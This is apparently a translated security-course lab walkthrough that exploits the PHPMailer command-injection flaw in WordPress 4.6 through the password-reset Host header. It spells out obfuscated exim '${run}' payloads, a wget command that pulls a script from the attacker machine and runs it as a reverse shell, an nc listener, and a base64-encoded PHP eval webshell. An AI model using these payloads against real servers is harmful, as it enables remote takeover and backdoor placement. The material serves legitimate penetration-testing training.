E048-Forum Vulnerability Analysis and Exploitation-Exploration of Remote Code Execution for WordPress Forum Plug-in

Course name:

E048-Forum Vulnerability Analysis and Exploitation-Exploration of Remote Code Execution for WordPress Forum Plug-in

Course Category:

Forum vulnerability analysis and utilization

Experimental Level:

intermediate

Task scenario:

【Task Scenario】

Xiao Wang received an invitation from Panshi Company to conduct a penetration test on the company’s forum. He has discovered that the forum’s WordPress uses the PHPMailer component to send emails to users. The component version is 5.2.18, which has a remote code execution vulnerability. He successfully exploited this After the vulnerability is exploited, the infiltrator can perform remote arbitrary code execution. Many well-known CMSs such as WordPress use this component to send emails, and the impact cannot be ignored.

Task analysis:

【Task Analysis】

If no common injection vulnerabilities are found, you can start with the plug-ins installed by the browser. For example, WordPress <= 4.7.1, PHPMailer (version < 5.2.18) has a remote command execution vulnerability. This vulnerability is an unknown vulnerability in WordPress Core 4.6. Authorized RCE vulnerability. An unauthorized attacker can exploit the vulnerability to achieve remote code execution and achieve instant access to the target server, ultimately leading to the complete compromise of the target application server. No plugins or non-standard settings are required to exploit this vulnerability. An attacker only needs to cleverly construct a malicious email address to write to any file, causing remote command execution harm. Perform penetration testing, backdoor placement, file management, resource search, command execution, system information collection and other functions.

Preliminary knowledge:

【Preliminary knowledge】

The previous version of PHPMailer 5.2.18 suffered from a remote code execution vulnerability, which may lead to (remote control of the device). The mailSend function in the PHPMailer Ismail transport, when the sender attribute is not set, could allow a remote attacker to pass extra parameters to the mail command and therefore execute arbitrary code by passing an address crafted with a ” (backslash double quote). Out of a GET /POST request; on the server side, the Trojan responds to each GET/POST request and generates a response packet.

When PHPMailer sends emails, the calling relationship of key functions.

Task implementation:

E048-Forum Vulnerability Analysis and Exploitation-Exploration of Remote Code Execution for WordPress Forum Plug-in

Task environment description:

Server scenario: p9_kali-6 (username: root; password: toor)

Server scenario operating system: Kali Linux 192.168.32.123

Server scenario: p9_linux-9 (username: root; password: 123456)

Server scenario operating system: Linux 192.168.32.184

————————————————– ————————————————– ————————–

Reproduction in actual combat:

Enter the target machine system, open the command terminal and enter the command docker run -i -t –rm -d -p 80:80 medicean/vulapps:w_wordpress_6, start the vulnerable container, then use the command docker ps to list the currently running containers, and finally Use the command docker exec -it ContainerID /bin/bash to enter the container for command line interaction.

-i: Allows you to interact with the standard input within the container

-t: Specify a pseudo terminal or terminal within the new container

–rm: Delete the container immediately after the container exits. Generally, there is no need to specify this parameter. Specifying --rm can avoid wasting space.

medicean/vulapps:w_wordpress_6: Start the container based on this image

/bin/bash: designated interactive shell

Use the penetration machine browser Firefox to access the vulnerability page. The path is located at /wp-login.php?action=lostpassword. The administrator resets the password page. At this time, WordPress calls the phpmailer component to send the password reset email.

Let’s enter the target machine to take a look at the vulnerability file class-phpmailer.php in WordPress. This file is in the wp-includes directory. If you open it and check it out, you will find the following lines of key code.

We found that the phpmailer component calls the Linux system command sendmail to send emails. The command format is: sendmail -t -i -fusername@hostname. Let’s continue to audit the code and discover it:

It is found that the serverHostname function obtains the host name through the incoming SERVER_NAME parameter, which is the host value in the HTTP request message. However, the SERVER_NAME parameter has not been filtered in any way, so we can perform arbitrary construction and splicing, resulting in system command injection. loopholes. However, WordPress and the PHPMailer library will prevent attackers from injecting empty characters (spaces or TAB) into the sendmail command. Moreover, adding parentheses to introduce the method of injecting parameters into sendmail no longer works. There will also be problems if we want to call /bin/touch, because if / appears in the host field, the server will reject our request. But our idea has come out. The first 17 goals are to bypass system detection by constructing statements, and then try to write the Webshell backdoor file through this method.

Before constructing the payload statement, we first return to the target operating system container. Note that root@ should be followed by the number of the container, otherwise it will not operate normally. After entering the container, use the command sendmail -be ‘$tod_log’ to view the system time. (The -be parameter is a string expansion test command, which can read the data of some variables. For example, the $tod_log file can display the system time).

Moreover, exim4 provides syntax parameters that we can use to construct support parameters (sendmail is actually a soft link to the software, which provides some functions to execute some commands, such as the string interception function substr and the $run system call function.) Use The command sendmail -be ‘${substr{10}{1}{$tod_log}}’ uses the substr function to intercept the first character starting from the tenth character of the result returned by the command, which is a space.

In the same way, let’s intercept the / string in the $_spool_directory file (the spool_directory variable exists by default and has no capital letters, so it can be executed reliably).

Then we test using the $run function to call system commands to execute

So far, our preparations have been completed and we have begun to construct our payload. Next, we try to create a hack.txt file in the /root directory.

The constructed statement is cc(any -froot@localhost -be ${run{/bin/touch /root/hack.txt}} null)

 cc(any -froot@localhost -be ${run{/bin/touch /root/hack.txt}} null)

Space==>{substr{10}{1}{$tod_log}}

slash==>{substr{0}{1}{$spool_directory}}

After conversion, it is cc(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{ 10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}root${substr{0}{1}{$spool_directory}}hack.txt}} null)

Return to the kali penetration machine, visit the target site http://172.16.1.33, and check whether the network communication is normal:

Enter the background login interface wp-login.php?action=lostpassword to view:

Go back to the browser to access the password reset page/wp-login.php?action=lostpassword, enter the reset user name admin, submit the intercepted request, change the host value to the payload we constructed, and then click the Forward button. Make a submission.

Constructed payload:

cc(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{ 10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null)

Go back to the /tmp directory of the target machine to check and find that the test.txt file was successfully created in the server:

Write the remote rebound shell script rce in the apache root directory, content:

Restart apache server

After the command is executed, the target machine will obtain a.txt from the penetration machine through the command wget and output it to the rce file in the /tmp directory. The executed payload is (note that the IP address of the penetration machine in the payload is modified to obtain the a.txt file) :

aa(any -froot@localhost -be ${run{/usr/bin/wget --output-document /tmp/rce 172.16.1.40/a.txt}} null) 

Converted to:

aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{ 0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0} {1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}172.16.1.40${substr{0}{1} {$spool_directory}}a.txt}} null)

Run the rce rebound shell script in the tmp directory

Execute the rebound shell: aa(any -froot@localhost -be ${run{/bin/bash /tmp/rce}} null)

aa(any -froot@localhost -be ${run{/bin/bash /tmp/rce}} null)

Use nc to monitor port 1345 on the rebound host and submit the payloads in order to obtain the rebound shell.

nc -nvv -l -p 1345

Extension: Some machines may not necessarily have the /dev/tcp directory. Because it is WordPress, there must be a PHP environment. The POC command can be changed to: echo “PD9waHAgQGV2YWwoJF9QT1NUWyd6J10pOz8 + Cg==” | base64 -d > /tmp/ z.php & amp; & php -S 0:7777 -t /tmp, the detailed operation will not be repeated.

When the experiment is over, shut down the virtual machine.